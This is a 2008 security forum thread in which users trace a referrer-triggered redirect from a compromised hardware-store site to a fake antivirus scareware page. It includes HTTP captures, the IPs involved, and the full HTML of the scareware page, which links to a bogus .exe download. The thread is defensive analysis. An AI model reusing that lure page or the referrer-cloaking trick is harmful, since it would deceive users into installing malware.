Re: winxp-antivir-on-line-scan in Security

Re: winxp-antivir-on-line-scan

Thu, 11 Sep 2008 06:42:46 EDT

Kayrac : Happy digging kuk ;)

-Brian

Re: winxp-antivir-on-line-scan

Wed, 10 Sep 2008 14:42:20 EDT

anon : Thanks for the reply & link at CastleCops. Seems like this is the same discussion. I'll see what I can dig up from the hosted website based on the Dave Taylor article linked above.

Re: winxp-antivir-on-line-scan

Wed, 10 Sep 2008 10:05:13 EDT

katarina : I would have .. but don't have an account set up there and don't really want to set one up. Too many things to keep track of. :(

I tried posting as a guest, but couldn't get past the squiggly letters.

Re: winxp-antivir-on-line-scan

Wed, 10 Sep 2008 10:02:10 EDT

Kayrac :

said by katarina :

Here's what appears to be another of the same type thing at Castle Cops.

»www.castlecops.com/p1111767-Anti···rch.html

Gave them a nudge in the right direction ;)

Re: winxp-antivir-on-line-scan

Wed, 10 Sep 2008 09:51:52 EDT

katarina : Here's what appears to be another of the same type thing at Castle Cops.

»www.castlecops.com/p1111767-Anti···rch.html

Re: winxp-antivir-on-line-scan

Tue, 09 Sep 2008 06:03:10 EDT

Kayrac :

said by papafz :

hey there... i am getting this on one of my client's sites. Going nuts trying to figure it out, but all of your observations about are exactly the same as mine (except i didnt get as far as u did in figuring out what caused it).

try searching for 'Kenny Meez'

If I go directly to KennyMeez.com i do not get the popup.. if i go from a Google result, i do but usually only the first time.

any help would be greatly appreciated.

»www.google.com/search?hl=en&q=%2···aq=f&oq=

(thats a google link for the /in blahblah that the exploit uses) the first link is macafee site advisor, the second is this thread, the next are ways to fix it

happy hunting ;)

-Brian

Re: winxp-antivir-on-line-scan

Tue, 09 Sep 2008 01:26:07 EDT

mysec : Thanks - while I knew from previous exploits that the problem is on the server, I didn't know specifically how these things work.

---

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 23:50:46 EDT

therube : Another light bulb just went on ...

The exploit only working 1 time, & clearing the cache ...

The exploit only works 1 time so long as you HAVE visited the legitimate site after the initial attempt. The reason is because the legit site is now in your cache & that is what loads on subsequent visits to the site.

The exploit will work multiple consecutive times if you HAVE NOT visited the legitimate site.

So if you go to Google, click their link to KennyMeez, you get malware. Click the Google link again & again, & each time you still get malware. After 1024 clicks on the Google link, if you then go directly to KennyMeez.com, the Google link will work correctly, because at that point you are actually loading the legit site from your browser /cache/.

As Kayrac's post pointed out the referrer it is looking for is of type *msn.*, but it looks to be even more general, *msn* (no dot needed). So setting the referrer as h ttp://abc123msnabc123/ also triggers the malware site to load.

("Legit site". I'm kind of saying it wrong. The site is & has been "legit". The Google link is "legit". It is just that there exists an exploit on the sites' server, a server-side exploit, that causes the malware page to load when specific referrers are found.)

EDIT: Oops, I misread the regular expression. .*msn.* will trigger on any (referrer) URL that has the chars msn in it. (At first I disregarded the opening .* & then mistook the closing .* to mean literally msn(dot)* - I was thinking the Windows way :uhh:.

And I might also say I know nothing of Apache servers or server scripts or ... so what I'm saying while very likely not totally accurate, is accurate in principle.

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 23:22:31 EDT

mysec : It looks like the same exploit. Clearing the cache usually lets you connect a second time.

Contact the server which hosts the site.

---

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 23:11:16 EDT

anon : hey there... i am getting this on one of my client's sites. Going nuts trying to figure it out, but all of your observations about are exactly the same as mine (except i didnt get as far as u did in figuring out what caused it).

try searching for 'Kenny Meez'

If I go directly to KennyMeez.com i do not get the popup.. if i go from a Google result, i do but usually only the first time.

any help would be greatly appreciated.

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 22:06:34 EDT

therube : So it is a server side exploit.

That makes a whole lot more sense to me compared the the 302. Not to mention it was far easier to read ;-).

So Google is not hacked, the web page itself is not hacked, it is the server that has been hacked.

But the 302 is still relevant I suppose (not that I know what 200's or 302's are or mean).

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 21:59:38 EDT

therube : At first I was going to say "explain more, what?".

I guess I could have explained more. I think I tried, but OFTEN the workings of this forum confuse me.

Anyhow, originally I was just going to describe the screenshots saying that they confirm what has been posted so far.

Further to that, & to explain a bit more ... I cleared my cache, & loaded davies directly - the 1st shot.

Note Data size: 9563, the size of the cached html file. And the response, 200 OK.

Cleared my cache again, but this time loaded davies, & also spoofed the referrer as msn.com - the 2nd shot.

This time Data size: 0, & the response, 302 Found. Not to mention the Location:.

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 15:06:57 EDT

anon : Said by mysec:
"Another thing - why doesn't the last URL 66.232.126.192 appear in that code?"

This might help explain it...
»www.robtex.com/ip/66.232.126.192.html#a4

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 10:53:51 EDT

mysec :

said by Kayrac :

Basically looks like they change a few things on their server(after breaking in) so it changes over to the malicious website when visiting from a search engine referrer, no malicious content is on davieshardware page

This is what turned up in the 2007 SloanTreeFarm Redirect exploit I posted earlier. Their page was clean, but the server which hosted them had been compromised.

---

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 07:32:23 EDT

Kayrac : I posted this over on another forum, MDL

within 5 minutes i had my answer :)

»www.askdavetaylor.com/how_people···les.html

credits to sowhat-x and sysadmini ;)

-Brian

Basically looks like they change a few things on their server(after breaking in) so it changes over to the malicious website when visiting from a search engine referrer, no malicious content is on davieshardware page

I couldn't figure it out myself, had to call in the professionals :P

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 05:10:02 EDT

katarina : Thank you all for checking this out. It's fascinating to watch the discussion, but much of it is way over my head.

All I know is that when I run into this stuff I do not click on anything and use task manager to end any running applications.

It is nice to have confirmed that it is not downloading without those "clicks."

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 01:28:45 EDT

Its a Secret : The second and fourth jpg's show the 'GET' command, and I'd hazard that's where the breach happened. One and three hit the actual page.

FYI - It looks like jpg 2 shows a different response-head that may well point to the actual target in jpg 4.
--
"In the future, that which is not mandatory will be illegal"

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 01:24:48 EDT

mysec : Can you explain more?

---

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 01:21:09 EDT

therube : Two shots, one direct, one spoofed.

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 01:19:08 EDT

Its a Secret :

said by mysec :

Another thing - why doesn't the last URL 66.232.126.192 appear in that code?

Maybe why? It looks like it self-refers to the doc (page) in question...maybe?

if(self.parent.frames.length!=0){self.parent.location=document.location}

--
"In the future, that which is not mandatory will be illegal"

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 01:09:40 EDT
mysec : Thanks -- very clever in covering tracks, don't you think?

Another thing - why doesn't the last URL 66.232.126.192 appear in that code?

---

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 01:01:34 EDT
Its a Secret :
said by mysec :

Now, can someone explain how these images are loaded onto my browser screen and there is no html file cached?
It may be here in the code:
HTTP/1.x 200 OK
Date: Mon, 08 Sep 2008 03:46:27 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
----------------------------------------------------------
--
"In the future, that which is not mandatory will be illegal"

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 00:54:46 EDT
mysec :
said by therube :

Maybe someone can make sense of this.
And as I thought, you are going to davies, but then sent to malware site.

Yes, just like the old Google exploit. Here are the firewall alerts:

First, to google search:

[att=1]

Then clicking on the link to davieshardware.com:

C:\>nslookup davieshardware.comName: davieshardwareAddress: 66.96.132.39
[att=2]

Then a page 302 error redirects to the site that calls out for the WinAntiVir files. From therube's code:

hxxp://87.248.180.90/in.html?s=ipw2

[att=3]

WhoIS:

inetnum: 87.248.176.0 - 87.248.191.255netname: STARNETMDdescr: SC STARNET SRLdescr: Chisinau, Moldovacountry: MDadmin-c: SA4929-RIPEtech-c: SA4929-RIPEstatus: ASSIGNED PAremarks: INFRA-AWremarks: Leased for Usersmnt-by: MNT-STARNETMDsource: RIPE # Filtered role: StarNet Administratorremarks:address: SC "STARNET" SRLaddress: 55, Maria Cibotari str.address: MD2012 Chisinauaddress: Moldova, Republic of
said by Its a Secret :

It looks to me like the referrer link has been encrypted/ scrambled so you can't see where it's pointed to. I may be wrong, but I don't think so.
Probably - I don't see a URL in therube's code but the firewall shows:

[att=4]

WhoIS:

NetRange: 66.232.96.0 - 66.232.127.255CIDR: 66.232.96.0/19NetName: NOC4HOSTS1NetHandle: NET-66-232-96-0-1Parent: NET-66-0-0-0-0NetType: Direct AllocationNameServer: NS.NOC4HOSTS.COMNameServer: NS2.NOC4HOSTS.COMComment:RegDate: 2005-10-21Updated: 2006-06-27 RAbuseHandle: NAA7-ARINRAbuseName: Noc4Hosts Abuse AdminRAbusePhone: +1-877-801-1443RAbuseEmail: abuse@noc4hosts.com
Not much info - can someone else search for this?

Now we are at the cleverest part of the exploit because no html page is cached in IE. (I cannot get the exploit to run in Opera).

Only the .gif files and the .js files are cached which do the work:

[att=5]

If you look at the screen after everything is loaded, it is a series of .gif files but no html file and no source code.

But if I load directly into the browser:

hxxp://87.248.180.90/in.html?s=ipw2

I get the the html file and can watch the code loading everything (thanks therube for getting that URL):

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" <html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"><title>Windows Antivirus</title><script>var mw_texts = new Array();</script><script>var install_link = 'http://soft-upgrade-network.com/antivirus.v.1.0.20586.exe';</script><script language="javascript" src="images/brand_co.js"></script><script language="javascript" src="images/mouse_te.js"></script><link href="images/pre_load.css" rel="stylesheet" type="text/css"> <script language=javascript>if(self.parent.frames.length!=0){self.parent.location=document.location}</script><script language=javascript>window.moveTo(0, 0); window.resizeTo(screen.availWidth, screen.availHeight);</script> <link href="images/window00.css" rel="stylesheet" type="text/css"><link href="images/this_lan.css" rel="stylesheet" type="text/css"><link href="images/translat.css" rel="stylesheet" type="text/css"></head><body> <div id="preloader"></div><script language="javascript" src="images/mouse_bl.js"></script><div class="mw_final_win" id="mw_results_window"><a class="mw_final_res" href="javascript:install_begun();"></a></div> <div class="mw_window" id="mw_main_win"><div class="mw_win_body"><div class="mw_window_plaz"> <div class="mw_search_left_panel"><a href="javascript:install_begun();" class="mw_security_panel"></a></div> <div class="mw_window_body"> <div id="mw_disk_c" class="mw_wi_disk mw_hd_disk"><span class="mw_name"><span class="local_c"></span></span><span id="mw_err_1" class="mw_error"><span class="hardw_error"></span></span></div><div id="mw_disk_d" class="mw_wi_disk mw_hd_disk"><span class="mw_name"><span class="local_d"></span></span><span id="mw_err_2" class="mw_error"><span class="hardw_error"></span></span></div><div id="mw_disk_dvd" class="mw_wi_disk mw_dvd_disk"><span class="mw_name"><span class="local_dvd"></span></span></div><div id="mw_disk_fldr" class="mw_wi_disk mw_folder_disk"><span class="mw_name"><span class="shared"></span></span><span id="mw_err_3" class="mw_error"><span class="sec_thr"></span></span></div> <br><br><br><br><br><br><br><hr color="#CCCCCC" size="1"><br><br><br><br><br><br><hr color="#CCCCCC" size="1"> <div class="mw_disclaimer"><span class="secr_thr_fndd"></span></div> <div class="mw_progress_bar"><span class="mw_status" id="mw_status"></span><div class="pb_decor"><div class="decor_lp"></div><div class="decor_rp"></div><div id="mw_progress_bar"></div></div><A id="mw_cncl_but" class="mw_cancel" href="javascript:install_begun();"></A> <div id="simulation_1"><span class="simulation_qts"></span></div></div><div class="mw_display_filename"><span class="mw_status"><span class="object"></span></span><span class="mw_filename" id="mw_file_name"></span></div> <div class="mw_test_results" id="mw_inwin_results"><div class="mw_test_rez_decor"><div class="mw_res_rtc"></div><div class="mw_header_f_res"><span class="hrdw_n_sec"></span></div><a class="mw_remove_button" href="http://soft-upgrade-network.com/antivirus.v.1.0.20586.exe"></a><div class="mw_res_pads"><span class="mw_res_hdr"><span class="hrdw_errors"></span></span><div class="mw_res_text"><span class="perfomance_usw"></span></div></div></div> </div></div></div> </div></body><script language="javascript" src="images/unic_scr.js"></script><script language="javascript" src="images/text_con.js"></script><script language="javascript" src="images/file_nam.js"></script><script language="javascript" src="images/domFunct.js"></script><script language="javascript" src="images/startaft.js"></script></html>
Now, can someone explain how these images are loaded onto my browser screen and there is no html file cached?

---

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 00:36:46 EDT
therube : »www.msn.com/ works to.

So by using a spoofer, simply by setting the URL & the Referrer, I can get the malware site to load.

http://www.davieshardware.com/sales.html GET /sales.html HTTP/1.1Host: www.davieshardware.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 SeaMonkey/1.1.12Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://www.msn.com/ HTTP/1.x 302 FoundDate: Mon, 08 Sep 2008 04:33:17 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveServer: ApacheLocation: http://87.248.180.90/in.html?s=ipw2----------------------------------------------------------http://87.248.180.90/in.html?s=ipw2 GET /in.html?s=ipw2 HTTP/1.1Host: 87.248.180.90User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 SeaMonkey/1.1.12Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://www.msn.com/Cookie: visited=16 HTTP/1.x 302 FoundDate: Mon, 08 Sep 2008 04:36:29 GMTServer: Apache/1.3.39 (Unix) PHP/5.2.5 with Suhosin-PatchX-Powered-By: PHP/5.2.5Set-Cookie: visited=17Location: http://winxp-antivir-on-line-scan.com/1/?id=20586Connection: closeTransfer-Encoding: chunkedContent-Type: text/html----------------------------------------------------------http://winxp-antivir-on-line-scan.com/1/?id=20586 GET /1/?id=20586 HTTP/1.1Host: winxp-antivir-on-line-scan.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 SeaMonkey/1.1.12Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://www.msn.com/Cookie: PHPSESSID=9c61627a737dfb6c3e220bbf40bab6fd HTTP/1.x 200 OKDate: Mon, 08 Sep 2008 04:33:18 GMTServer: Apache/1.3.41 (Unix) PHP/5.2.6X-Powered-By: PHP/5.2.6Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html----------------------------------------------------------
I've tried a number of other "likely" search engines as the referrer (including www.live.com & ask.com) but only Google, Yahoo, & MSN seem to make it click.

Now, mysec's link mentions 302's & so do my captures, HTTP/1.x 302 Found.

Note that /cache/ or cookies may have an affect on what you see or don't see. Like if a page is in /cache/ & I resend the spoof, I can't capture it again, until I clear /cache/.

(I see a "koma3504" to the left of this post. Does anyone else? What does it mean?)

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 00:26:55 EDT
therube : Ok, looks like it is going to be related to the search engine?

I manually open up davies.
I click the Product Line link, the & product.html page opens.

I manually open up davies.
I manually change the URL line to read davies/product.html (but do not press return).
I spoof the referrer to, »search.yahoo.com/.
The malware page opens.

Note that many times, after first doing this, it is not repeatable.

Re: winxp-antivir-on-line-scan

Mon, 08 Sep 2008 00:08:29 EDT
therube : I'm not finished reading it yet, but it appears that we should see discrepancy in the listed search engine (green) URL & the actual website URL? But in this case, they are the same?

Re: winxp-antivir-on-line-scan

Sun, 07 Sep 2008 23:59:44 EDT
Its a Secret : It looks to me like the referrer link has been encrypted/ scrambled so you can't see where it's pointed to. I may be wrong, but I don't think so.

Opinions on this?

PS - I used to use code like this to protect my private js from being nicked.
--
"In the future, that which is not mandatory will be illegal"

Re: winxp-antivir-on-line-scan

Sun, 07 Sep 2008 23:49:25 EDT
therube : Maybe someone can make sense of this.
And as I thought, you are going to davies, but then sent to malware site.

http://rds.yahoo.com/_ylt=A0geu5T2n8RIhxEAKJpXNyoA;_ylu=X3oDMTEzajlma2luBHNlYwNzcgRwb3MDMQRjb2xvA2FjMgR2dGlkA0RGRDVfMTMx/SIG=11om9p0p8/EXP=1220931958/**http%3a//davieshardware.com/index.html GET /_ylt=A0geu5T2n8RIhxEAKJpXNyoA;_ylu=X3oDMTEzajlma2luBHNlYwNzcgRwb3MDMQRjb2xvA2FjMgR2dGlkA0RGRDVfMTMx/SIG=11om9p0p8/EXP=1220931958/**http%3a//davieshardware.com/index.html HTTP/1.1Host: rds.yahoo.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 SeaMonkey/1.1.12Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://search.yahoo.com/search;_ylt=A0geu71amcRIz.wAaKil87UF?p=davies+hardware&ei=UTF-8&iscqry=&fr=sfpCookie: YLS=v=1&p=0&n=0; PH=fn=CH7mzqunQWRt56e.Nok-&l=en-US; F=a=FQCDrdkMvTBrQGXXM0sXdCxdtTo2GS1zxHOAgQ0iVrQdfd1lU8uLnIEVdHLqHVnXab27zp2dwYpdNC N0sAqdd3OfnA--&b=SI_P; ystat_cn_bc=11752904991107379741; B=2ssp5cl42c4lq&b=4&d=4NxfvXtpYEIaqeg3pV90SL6ZhDEAMbmDu1skFFwlukNx&s=uo; PL=V=1.1&d=2Y7.G3_fGIM5CYSjL3dBf6R6Q3UtzuBBfSm2xL1IWjAGIbCD8puzvXyB1mPOdJdTrpiSpJM8wHh5ByFrsQ--; Y=v=1&n=f17cvluv5g8j3&l=i914diao/o&p=m1s0kkdb53020600&r=7d&lg=en-US&intl=us&np=1; T=z=QvywIBQDa1IBrLo0BQURj1IMTUzBk42Nk8yNDE2MA--&a=QAE&sk=DAAwvKfseiuizp&ks=EAAiPJHKS_djkTfz9k5BzjNZA--~A&d=c2wBTmpJMEFUa3hNVGcxTXpZeE53LS0BYQFRQUUBZwFOTTZPN0lLQ0JPU0NJRlZaRTVMS0g2V0sySQF0 aXABaWxla01DAXp6AVF2eXdJQkE3RQ-- HTTP/1.x 302 FoundDate: Mon, 08 Sep 2008 03:46:24 GMTCache-Control: private, max-age=0, no-cacheP3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"Location: http://davieshardware.com/index.htmlConnection: closeContent-Type: text/html; charset=utf-8----------------------------------------------------------http://davieshardware.com/index.html GET /index.html HTTP/1.1Host: davieshardware.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 SeaMonkey/1.1.12Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://search.yahoo.com/search;_ylt=A0geu71amcRIz.wAaKil87UF?p=davies+hardware&ei=UTF-8&iscqry=&fr=sfp HTTP/1.x 302 FoundDate: Mon, 08 Sep 2008 03:46:24 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveServer: ApacheLocation: http://87.248.180.90/in.html?s=ipw2----------------------------------------------------------http://87.248.180.90/in.html?s=ipw2 GET /in.html?s=ipw2 HTTP/1.1Host: 87.248.180.90User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 SeaMonkey/1.1.12Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://search.yahoo.com/search;_ylt=A0geu71amcRIz.wAaKil87UF?p=davies+hardware&ei=UTF-8&iscqry=&fr=sfpCookie: visited=3 HTTP/1.x 302 FoundDate: Mon, 08 Sep 2008 03:49:39 GMTServer: Apache/1.3.39 (Unix) PHP/5.2.5 with Suhosin-PatchX-Powered-By: PHP/5.2.5Set-Cookie: visited=4Location: http://winxp-antivir-on-line-scan.com/1/?id=20586Connection: closeTransfer-Encoding: chunkedContent-Type: text/html----------------------------------------------------------http://winxp-antivir-on-line-scan.com/1/?id=20586 GET /1/?id=20586 HTTP/1.1Host: winxp-antivir-on-line-scan.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 SeaMonkey/1.1.12Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://search.yahoo.com/search;_ylt=A0geu71amcRIz.wAaKil87UF?p=davies+hardware&ei=UTF-8&iscqry=&fr=sfpCookie: PHPSESSID=9c61627a737dfb6c3e220bbf40bab6fd HTTP/1.x 200 OKDate: Mon, 08 Sep 2008 03:46:27 GMTServer: Apache/1.3.41 (Unix) PHP/5.2.6X-Powered-By: PHP/5.2.6Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html----------------------------------------------------------

Re: winxp-antivir-on-line-scan

Sun, 07 Sep 2008 23:45:55 EDT
Its a Secret : Was this from a 'sponsored' link, or a regular link? That may provide another clue...
--
"In the future, that which is not mandatory will be illegal"

Re: winxp-antivir-on-line-scan

Sun, 07 Sep 2008 23:43:34 EDT
mysec :
said by therube :

Yes, it can be exploited in other search engines. See

»clsc.net/research/google-302-page-hijack.htm

Re: winxp-antivir-on-line-scan

Sun, 07 Sep 2008 23:42:08 EDT
ravencajun : you wanted the link to malwarebytes?

[Mod Note: Removed! No .exes! »Posting Rules - Security ]

edit: Opps I am so sorry I grabbed the direct link instead of the site link which is what I meant to post, was definitely a mistake on my part. :(

Re: winxp-antivir-on-line-scan

Sun, 07 Sep 2008 23:32:43 EDT
therube : Why?

It is not Google, cause you can get the same results if you perform the search on Yahoo & open the site from there.

So if it is not Google & not Yahoo, then what?

And why is it that (sometimes) only the first time you attempt it, you are redirected.

davies has to be hacked, doesn't it?
Perhaps from a "gif"? Perhaps dealing with this line, onLoad="MM_preloadImages('images/sales_off-over.gif', ...

There are also various "MM" functions, like, function MM_preloadImages(). Their usage (in general, I don't know about on this site) appear legit.

That part of the code is run by JavaScript.

But you are redirected in SeaMonkey with NoScript blocking JavaScript, so that makes me believe it has something to do with the onLoad & a "gif"?

Re: winxp-antivir-on-line-scan

Sun, 07 Sep 2008 22:20:20 EDT
Millenniumle : If you load Davies Hardware directly, then use the Google link, Davies loads instead of the bogus site.

XP Pro IE6 SP3, scripts disabled.

Re: winxp-antivir-on-line-scan

Sun, 07 Sep 2008 22:15:14 EDT
mysec : AT least this exploit is not remote code execution, and brings up the File Download Box:

[att=1]

said by katarina :

Edit: You have to actually click on the link from the Google Search results to make it happen. If you type the address in the IE address bar, you arrive at the proper site.

This is reminiscent the Google Referer exploit from last summer. In that one, the exploit worked by remote code execution: no download prompt. See here for an analysis.

»www.urs2.net/rsj/computing/tests/redirect

---

Re: winxp-antivir-on-line-scan

Sun, 07 Sep 2008 21:44:25 EDT
katarina :
said by Doctor Four :

... while using Firefox with NoScript will stop nearly all of them.

Just in case something does get installed, Malware Bytes
Anti Malware seems to do a good job at removing these.
I was looking at NoScript today. I just haven't done it yet. I was also looking for Malware Bytes but was looking for a link to a valid download site. I'm always afraid that when I search with Google for security software that a copy cat site will lead me astray and I will land in the wrong place and download the wrong thing.

edit: for clarification

Re: winxp-antivir-on-line-scan

Sun, 07 Sep 2008 21:06:04 EDT
katarina : Search for "davieshardware"

Hudson Valley Commercial Hardware - Davies HardwareSupplier of commercial, industrial architectural and residential hardware. Serving Dutchess and surrounding counties for over 100 years.
xxx.davieshardware.com/ - 10k - Cached - Similar pages

Edit: You have to actually click on the link from the Google Search results to make it happen. If you type the address in the IE address bar, you arrive at the proper site.

Re: winxp-antivir-on-line-scan

Sun, 07 Sep 2008 21:00:16 EDT
Doctor Four : Not all AV software can detect fraudware site redirects, or
their install attempts. And the scan attempts are always
bogus, anyway.

And as long as you didn't click on anything, you're probably
OK. There was likely a hijacked ad on the search results, or
it could have been a spammed or fake blog that matched on
the search results. Best thing to do when one of these comes
up is to use the Task Manager to kill IE.

A hosts file will prevent many of these redirects, while
using Firefox with NoScript will stop nearly all of them.
Just in case something does get installed, Malware Bytes
Anti Malware seems to do a good job at removing these.

What site did you click on the Google search? If you could,
post the URL as hxxp...etc like the other one.
--
"The trouble with computers, of course, is that they are very sophisticated idiots." - Doctor Who (from Robot)

winxp-antivir-on-line-scan

Sun, 07 Sep 2008 20:10:33 EDT
katarina : Clicking on a Google search result took me to the following site instead of the expected site.

hxxp://winxp-antivir-online-scan.com/1/?id=20586

There was not a peep from either Avast or Windows Defender. I disconnected from the internet and ended the tasks from task manager.

Should there have been some type of notice from one or the other when it "appeared" that my system was being scanned?

XP Home SP2
IE 7